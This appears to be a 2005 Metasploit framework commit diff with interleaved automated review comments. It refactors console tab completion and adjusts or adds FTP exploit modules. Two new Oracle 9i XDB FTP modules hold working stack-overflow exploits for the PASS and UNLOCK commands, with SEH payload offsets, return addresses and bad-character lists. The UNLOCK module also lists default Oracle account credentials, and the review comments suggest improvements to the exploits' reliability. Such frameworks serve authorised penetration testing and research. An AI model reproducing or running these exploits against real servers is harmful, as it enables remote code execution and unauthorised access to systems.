Many fixes/updates/new ftp modules

Fixed the tab completion hackery - moved from driver to dispatcher_shell


git-svn-id: file:///home/svn/incoming/trunk@3094 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2005-11-25 04:11:22 +00:00
parent 6c4703add7
commit cd8b9849ce
6 changed files with 201 additions and 40 deletions


@ -66,9 +66,7 @@ class Driver < Msf::Ui::Driver
# Process the resource script
process_rc_file
# Initialize the tab completion array
self.tab_words = []
end
#
@ -202,7 +200,6 @@ class Driver < Msf::Ui::Driver
protected
attr_writer :framework # :nodoc:
attr_accessor :tab_words # :nodoc:
##
#
@ -262,31 +259,6 @@ protected
set_log_level(Rex::LogSource, val)
set_log_level(Msf::LogSource, val)
end
#
# This method accepts the entire line of text from the Readline
# routine, stores all completed words, and passes the partial
# word to the real tab completion function. This works around
# a design problem in the Readline module and depends on the
# Readline.basic_word_break_characters variable being set to \x00
#
def tab_complete(str)
# Check trailing whitespace so we can tell 'x' from 'x '
str_match = str.match(/\s+$/)
str_trail = (str_match.nil?) ? '' : str_match[0]
# Split the line up by whitespace into words
str_words = str.split(/[\s\t\n]+/)
# Append an empty word if we had trailing whitespace
str_words << '' if str_trail.length > 0
# Place the word list into an instance variable
self.tab_words = str_words
# Pop the last word and pass it to the parent
super(self.tab_words.pop)
end
end


@ -90,14 +90,42 @@ module DispatcherShell
def initialize(prompt, prompt_char = '>')
super
# Initialze the dispatcher array
self.dispatcher_stack = []
# Initialize the tab completion array
self.tab_words = []
end
#
# Performs tab completion on shell input if supported.
# Current words can be found in self.tab_words
# This method accepts the entire line of text from the Readline
# routine, stores all completed words, and passes the partial
# word to the real tab completion function. This works around
# a design problem in the Readline module and depends on the
# Readline.basic_word_break_characters variable being set to \x00
#
def tab_complete(str)
# Check trailing whitespace so we can tell 'x' from 'x '
str_match = str.match(/\s+$/)
str_trail = (str_match.nil?) ? '' : str_match[0]
# Split the line up by whitespace into words
str_words = str.split(/[\s\t\n]+/)
# Append an empty word if we had trailing whitespace
str_words << '' if str_trail.length > 0
# Place the word list into an instance variable
self.tab_words = str_words
# Pop the last word and pass it to the real method
tab_complete_stub(self.tab_words.pop)
end
# Performs tab completion of a command, if supported
# Current words can be found in self.tab_words
#
def tab_complete_stub(str)
items = []
# puts "Words(#{tab_words.join(", ")}) Partial='#{str}'"
@ -111,10 +139,6 @@ module DispatcherShell
items.concat(dispatcher.commands.to_a.map { |x| x[0] })
end
# XXX - This should now be obsolete!
# If the dispatcher has custom tab completion items, use them
# items.concat(dispatcher.tab_complete_items || [])
# If the dispatcher exports a tab completion function, use it
if(dispatcher.respond_to?('tab_complete_helper'))
res = dispatcher.tab_complete_helper(str, tab_words)
@ -275,6 +299,7 @@ module DispatcherShell
attr_accessor :dispatcher_stack # :nodoc:
attr_accessor :tab_words # :nodoc:
end
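Review bot: On an empty input line `tab_complete` hands `nil` to `tab_complete_stub`, because `"".split(/[\s\t\n]+/)` is `[]`, no trailing-whitespace word is appended, and `[].pop` is `nil`; whatever the stub does with `str` past the visible lines (the `tab_complete_helper` call forwards it unchanged) then receives `nil` instead of a string. `tab_complete_stub(self.tab_words.pop || '')` keeps that contract a string, and `/\s+/` already covers the tab and newline in the split pattern. The header comment says the method depends on `Readline.basic_word_break_characters` being `\x00`, but nothing in this file section sets it — if that is done elsewhere the comment should say where, otherwise `initialize` is the natural place. The commented-out `tab_complete_items` block under the `XXX` note in the third hunk is dead code now that the move is complete and can be dropped. `tab_complete_stub` continues past the end of its hunk.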


@ -54,7 +54,7 @@ class Exploits::Windows::Ftp::GlobalScapeInputOverflow < Msf::Exploit::Remote
buf[2043, 4] = [ target.ret ].pack('V')
buf[2047, payload.encoded.length] = payload.encoded
send_cmd( [buf] , false )
send_cmd( [buf] )
disconnect
handler
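Review bot: Dropping the `false` second argument to `send_cmd` changes what happens after the overflow buffer is sent, and the new Oracle PASS module in this same commit still passes `false` explicitly on its overflow send, so the two modules disagree on whether the default is what an overflow send wants. The Ftp mixin that defines `send_cmd` is not in this diff, so confirm its default: if it means waiting for a reply, this exploit may now block on a service it has just crashed before reaching `disconnect` and `handler`; if the default already equals `false`, the explicit argument in the Oracle modules is the inconsistent one. The `exploit` method starts before this hunk.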


@ -1,5 +1,4 @@
require 'msf/core'
require 'msf/core/exploit/ftp'
module Msf
@ -100,8 +99,8 @@ class Exploits::Windows::Ftp::NetTermNetFTPOverflow < Msf::Exploit::Remote
buf[1, payload.encoded.length] = payload.encoded
buf[1014, 4] = [ target.ret ].pack('V')
send_cmd( ["USER #{buf}"] , true )
send_cmd( ['HELP'] , true )
send_cmd( ["USER #{buf}"] )
send_cmd( ['HELP'] )
disconnect


@ -0,0 +1,83 @@
require 'msf/core/exploit/ftp'
module Msf
class Exploits::Windows::Ftp::Oracle9iXDPPassOverflow < Msf::Exploit::Remote
include Exploit::Remote::Ftp
include Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle 9i XDB FTP PASS Overflow (win32)',
'Description' => %q{
By passing an overly long string to the PASS command, a
stack based buffer overflow occurs. David Litchfield, has
illustrated multiple vulnerabilities in the Oracle 9i XML
Database (XDB), during a seminar on "Variations in exploit
methods between Linux and Windows" presented at the Blackhat
conference.
},
'Author' => [ 'y0 <y0[at]w00t-shell.net>' ],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '2449'],
[ 'BID', '8375'],
[ 'CVE', '2003-0727'],
[ 'URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'],
[ 'MIL', '48'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 800,
'BadChars' => "\x00\x20\x0a\x0d",
'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
},
'Targets' =>
[
[
'Oracle 9.2.0.1 Universal',
{
'Platform' => 'win',
'Ret' => 0x60616d46, # oraclient9.dll (pop/pop/ret)
},
],
],
'DisclosureDate' => 'Aug 18 2003',
'DefaultTarget' => 0))
end
def check
connect
disconnect
if (banner =~ /9\.2\.0\.1\.0/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect
print_status("Trying target #{target.name}...")
usr = Rex::Text.rand_text_english(rand(8)+1, payload_badchars)
buf = Rex::Text.rand_text_english(1292, payload_badchars)
seh = generate_seh_payload(target.ret)
buf[442, seh.length] = seh
send_cmd( ['USER', usr], true )
send_cmd( ['PASS', buf], false )
disconnect
handler
end
end
end
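Review bot: `check` returns `Vulnerable` on nothing but a `9.2.0.1.0` banner match, and it reads `banner` only after `disconnect`, so it relies on the Ftp mixin keeping the greeting available after the socket is closed — that dependency is not visible here and deserves a comment above the regex, e.g. `# Version check only: relies on the mixin caching the greeting in 'banner'; a patched 9.2.0.1.0 still matches`. The author string `y0 <y0[at]w00t-shell.net>` is formatted differently from the same author's `y0 <y0@w00t-shell.net>` in the companion UNLOCK module, which also credits Litchfield; the two new modules were clearly written together and should agree on their metadata.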


@ -0,0 +1,82 @@
require 'msf/core/exploit/ftp'
module Msf
class Exploits::Windows::Ftp::Oracle9iXDBUnlockOverflow < Msf::Exploit::Remote
include Exploit::Remote::Ftp
include Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle 9i XDB FTP UNLOCK Overflow (win32)',
'Description' => %q{
By passing an overly long token to the UNLOCK command, a
stack based buffer overflow occurs. David Litchfield, has
illustrated multiple vulnerabilities in the Oracle 9i XML
Database (XDB), during a seminar on "Variations in exploit
methods between Linux and Windows" presented at the Blackhat
conference. Oracle9i includes a number of default accounts,
including dbsnmp:dbsmp, scott:tiger, system:manager, and
sys:change_on_install.
},
'Author' => [ 'y0 <y0@w00t-shell.net>', 'David Litchfield <david@ngssoftware.com>' ],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '2449'],
[ 'BID', '8375'],
[ 'CVE', '2003-0727'],
[ 'URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'],
[ 'MIL', '47'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 800,
'BadChars' => "\x00\x20\x0a\x0d",
'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
},
'Targets' =>
[
[
'Oracle 9.2.0.1 Universal',
{
'Platform' => 'win',
'Ret' => 0x60616d46, # oraclient9.dll (pop/pop/ret)
},
],
],
'DisclosureDate' => 'Aug 18 2003',
'DefaultTarget' => 0))
end
def check
connect
disconnect
if (banner =~ /9\.2\.0\.1\.0/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect_login
print_status("Trying target #{target.name}...")
buf = Rex::Text.rand_text_english(1130, payload_badchars)
seh = generate_seh_payload(target.ret)
buf[322, seh.length] = seh
send_cmd( ['UNLOCK', '/', buf] , false )
disconnect
handler
end
end
end
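Review bot: The description advertises the default account `dbsnmp:dbsmp`, which looks like a typo for `dbsnmp:dbsnmp` (user and password are normally identical in that well-known Oracle default); since this module needs `connect_login` to succeed before the `UNLOCK` send, a wrong credential hint is the first thing an operator will copy. `exploit` also never checks that `connect_login` succeeded before sending the overflow — if the mixin reports failure by return value rather than by raising, a guard plus a comment such as `# UNLOCK is only reachable post-login; connect_login must authenticate first` would help, and if it raises, the comment should say so. `check` is byte-identical to the PASS module's and shares its banner-only limitation.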